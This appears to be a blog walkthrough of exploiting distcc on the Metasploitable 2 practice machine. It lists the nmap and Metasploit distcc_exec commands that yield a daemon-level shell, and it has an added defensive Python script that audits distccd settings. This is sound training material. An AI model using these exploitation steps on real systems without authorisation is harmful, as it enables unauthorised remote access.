Wednesday, October 12, 2016

Pwning Metasploitable 2: Exploiting distcc v1 (GNU) 4.2.4

Let's look at port 3632.

Metasploitable 2 is running distcc.

distcc is a program used to distribute the compilation of code across machines on a network, taking advantage of unused processing power on other computers. Machines on the network need to have the distccd daemon and a compatible compiler installed.


Scanning port 3632


Enter the command: nmap -sV -p 3632 <<target IP address>>



The Nmap scan shows that distccd v1 is running on port 3632.


Searching for exploit in msfconsole


Start up your msfconsole and search for a distcc exploit.

Enter the command: search distcc




There is an exploit available for distcc. More references here and here.


Exploiting distcc using distcc_exec exploit


Let's use the exploit by entering the command: use exploit/unix/misc/distcc_exec




As usual, we need to give the exploit a target.

Enter the command: set RHOST <<target IP address>>




...and exploit :)



The exploit was successful, as a command shell session was opened.

However, unlike other times where we got "root" as our id, here we got daemon as the id. That means we compromised the target with daemon rights.

A daemon is a program that runs as a background process. It can't do nearly as much as root.

The good news is that we have privilege escalation, which bumps the privilege level to root by exploiting bugs in the code. We will use privilege escalation soon to bump our access level from daemon to root.
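For the defender's side of this, here is a small audit script that is not part of the original post: it reads `ps -eo user,args` output, picks out distccd processes, and flags the two settings that let an unauthenticated client on the network submit jobs the way this exploit does, namely a missing `--allow` client restriction and a listener bound to all interfaces (no `--listen`). It also notes the account the daemon runs as, since that is the privilege a successful job lands with (daemon on Metasploitable 2). The ps lines below are constructed sample input, not taken from the page.

```python
import shlex
from typing import Dict, List

# Constructed sample of `ps -eo user,args` output (assumed format: header, then user + command).
SAMPLE_PS = """\
USER     COMMAND
root     /usr/sbin/sshd
daemon   distccd --daemon --port 3632
distcc   /usr/bin/distccd --daemon --allow 10.0.0.0/24 --listen 10.0.0.5 --user distcc
"""


def parse_ps(text: str) -> List[Dict[str, object]]:
    """Return {'user', 'argv'} for every distccd process in ps output."""
    procs = []
    for line in text.splitlines()[1:]:          # skip the header row
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        user, cmd = parts
        argv = shlex.split(cmd)
        if argv and argv[0].rsplit("/", 1)[-1] == "distccd":
            procs.append({"user": user, "argv": argv})
    return procs


def opt_values(argv: List[str], name: str) -> List[str]:
    """Collect values of a repeatable '--name value' or '--name=value' option."""
    vals = []
    for i, tok in enumerate(argv):
        if tok == name and i + 1 < len(argv):
            vals.append(argv[i + 1])
        elif tok.startswith(name + "="):
            vals.append(tok.split("=", 1)[1])
    return vals


def audit(proc: Dict[str, object]) -> List[str]:
    """Findings for one distccd process; an empty list means nothing to flag."""
    argv, user = proc["argv"], proc["user"]
    findings = []
    if not opt_values(argv, "--allow"):
        findings.append("no --allow: any host that can reach port 3632 may submit jobs")
    listen = opt_values(argv, "--listen")
    if not listen or "0.0.0.0" in listen:
        findings.append("bound on all interfaces: add --listen <build-network address>")
    if user == "root":
        findings.append("runs as root: a submitted job would execute with root rights")
    return findings


if __name__ == "__main__":
    for p in parse_ps(SAMPLE_PS):
        print(p["user"], " ".join(p["argv"]), audit(p) or ["ok"])
```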


-Jayesh Kerai (@secjay)
